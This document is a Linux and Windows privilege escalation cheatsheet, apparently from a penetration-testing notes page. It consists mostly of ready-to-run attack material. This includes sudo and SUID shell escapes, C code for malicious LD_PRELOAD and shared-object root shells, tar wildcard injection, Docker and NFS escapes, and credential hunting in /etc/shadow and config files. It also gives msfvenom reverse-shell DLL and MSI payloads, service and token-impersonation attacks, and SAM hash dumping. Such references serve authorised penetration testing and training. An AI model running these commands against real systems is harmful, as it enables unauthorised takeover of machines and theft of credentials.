9.2 KiB
9.2 KiB
Privilege Escalation Cheatsheet
Quick reference for Linux and Windows privilege escalation techniques.
Linux Privilege Escalation
Initial Enumeration
System Information
# Who am I?
whoami
id
# Hostname and kernel
hostname
uname -a
cat /proc/version
cat /etc/issue
# Architecture
lscpu
# Running processes
ps aux
ps aux | grep root
User Enumeration
# Current user privileges
sudo -l
# List users
cat /etc/passwd
cat /etc/passwd | cut -d: -f1
# Password hashes (if readable)
cat /etc/shadow
# Groups
cat /etc/group
# Command history
history
cat ~/.bash_history
Network Enumeration
# IP address
ifconfig
ip a
# Routes
ip route
route -n
# ARP table
arp -a
ip neigh
# Open ports
netstat -ano
ss -tulpn
# Active connections
netstat -antup
Password Hunting
# Search for passwords
grep --color=auto -rnw '/' -ie "PASSWORD=" 2>/dev/null
grep --color=auto -rnw '/' -ie "PASS=" 2>/dev/null
# Find password files
locate password | more
find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
# SSH keys
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
# Config files
find / -name "*.conf" 2>/dev/null | xargs grep -l "pass" 2>/dev/null
Automated Tools
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# linux-exploit-suggester
./linux-exploit-suggester.sh
# pspy (process monitoring)
./pspy64
Kernel Exploits
# Check kernel version
uname -r
uname -a
# Search for exploits
searchsploit linux kernel <version>
searchsploit linux kernel 4.4
# Common kernel exploits
# Dirty COW (CVE-2016-5195) - Linux < 4.8.3
# DirtyCred (CVE-2022-2588)
Sudo Abuse
Check Sudo Permissions
sudo -l
GTFOBins Exploitation
# vim
sudo vim -c ':!/bin/sh'
# awk
sudo awk 'BEGIN {system("/bin/bash")}'
# find
sudo find . -exec /bin/sh \; -quit
# less/more
sudo less /etc/passwd
!/bin/sh
# nmap (old versions)
sudo nmap --interactive
!sh
# python
sudo python -c 'import os; os.system("/bin/sh")'
# perl
sudo perl -e 'exec "/bin/sh";'
# ruby
sudo ruby -e 'exec "/bin/sh"'
LD_PRELOAD
# If sudo -l shows: env_keep+=LD_PRELOAD
# Create malicious shared object:
# shell.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
# Compile and execute
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so <allowed_program>
Sudo CVEs
# CVE-2019-14287 (sudo < 1.8.28)
sudo -u#-1 /bin/bash
# Baron Samedit CVE-2021-3156 (sudo 1.8.2-1.8.31p2, 1.9.0-1.9.5p1)
# Use exploit from GitHub
SUID Binaries
Find SUID Binaries
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Exploitation
# Check GTFOBins for SUID exploitation
# base64
./base64 /etc/shadow | base64 -d
# cp
./cp /etc/passwd /tmp/passwd
# modify and copy back
# find
./find . -exec /bin/sh -p \; -quit
# vim
./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
Shared Object Injection
# Find SUID binary dependencies
strace /path/to/suid-binary 2>&1 | grep -i -E "open|access|no such file"
# If it loads a missing .so file from writable path:
# Create malicious .so
# libcalc.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
gcc -shared -fPIC libcalc.c -o /path/to/libcalc.so
Capabilities
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Common exploitable capabilities
# cap_setuid+ep - can change UID
# Python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
Cron Jobs
# System cron
cat /etc/crontab
ls -la /etc/cron.*
# User cron
crontab -l
# Look for:
# - Writable scripts
# - Writable paths in scripts
# - Wildcard injection opportunities
# Wildcard injection (tar)
# If cron runs: tar czf /tmp/backup.tar.gz *
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
NFS Root Squashing
# Check NFS exports
cat /etc/exports
showmount -e <target>
# If no_root_squash is set:
# Mount on attacker machine
mkdir /tmp/nfs
mount -o rw <target>:/share /tmp/nfs
# Create SUID binary
cp /bin/bash /tmp/nfs/bash
chmod +s /tmp/nfs/bash
# On target
/share/bash -p
Docker Escape
# Check if in docker
cat /proc/1/cgroup | grep docker
ls -la /.dockerenv
# If user is in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# If docker.sock is accessible
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh
PATH Hijacking
# If SUID binary calls commands without full path:
# 1. Create malicious binary
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
# 2. Prepend PATH
export PATH=/tmp:$PATH
# 3. Run SUID binary
Windows Privilege Escalation
Initial Enumeration
System Information
systeminfo
hostname
whoami
whoami /priv
whoami /groups
net user
net user <username>
net localgroup
net localgroup administrators
Network Enumeration
ipconfig /all
route print
arp -a
netstat -ano
Process/Service Enumeration
tasklist /SVC
sc query
wmic service list brief
Find Passwords
findstr /si password *.txt *.ini *.config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Automated Tools
# WinPEAS
.\winPEAS.exe
# PowerUp
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
# windows-exploit-suggester
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo systeminfo.txt
# Seatbelt
.\Seatbelt.exe -group=all
Service Exploits
Unquoted Service Paths
# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\"
# If path is: C:\Program Files\Some Service\service.exe
# Drop malicious exe at: C:\Program.exe or C:\Program Files\Some.exe
Weak Service Permissions
# Check service permissions
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv <username> *
# If SERVICE_CHANGE_CONFIG:
sc config <service> binpath= "C:\temp\shell.exe"
sc stop <service>
sc start <service>
DLL Hijacking
# Find DLL search order issues
# Use Process Monitor to find missing DLLs
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > evil.dll
Token Impersonation
Check Privileges
whoami /priv
SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
# Potato attacks
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\shell.exe" -t *
# PrintSpoofer (Windows 10/Server 2019)
.\PrintSpoofer.exe -i -c cmd
# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"
Registry Exploits
AlwaysInstallElevated
# Check if enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both return 1:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > shell.msi
msiexec /quiet /qn /i shell.msi
AutoRun
# Check autorun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Check if writable
accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program"
Saved Credentials
# List saved credentials
cmdkey /list
# RunAs with saved creds
runas /savecred /user:admin C:\temp\shell.exe
SAM/SYSTEM Dump
# If you can access:
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
# Or backup locations:
C:\Windows\Repair\SAM
C:\Windows\Repair\SYSTEM
# Extract hashes
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Kernel Exploits
# Check Windows version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# Common exploits
# MS16-032 (Secondary Logon Handle)
# MS17-010 (EternalBlue)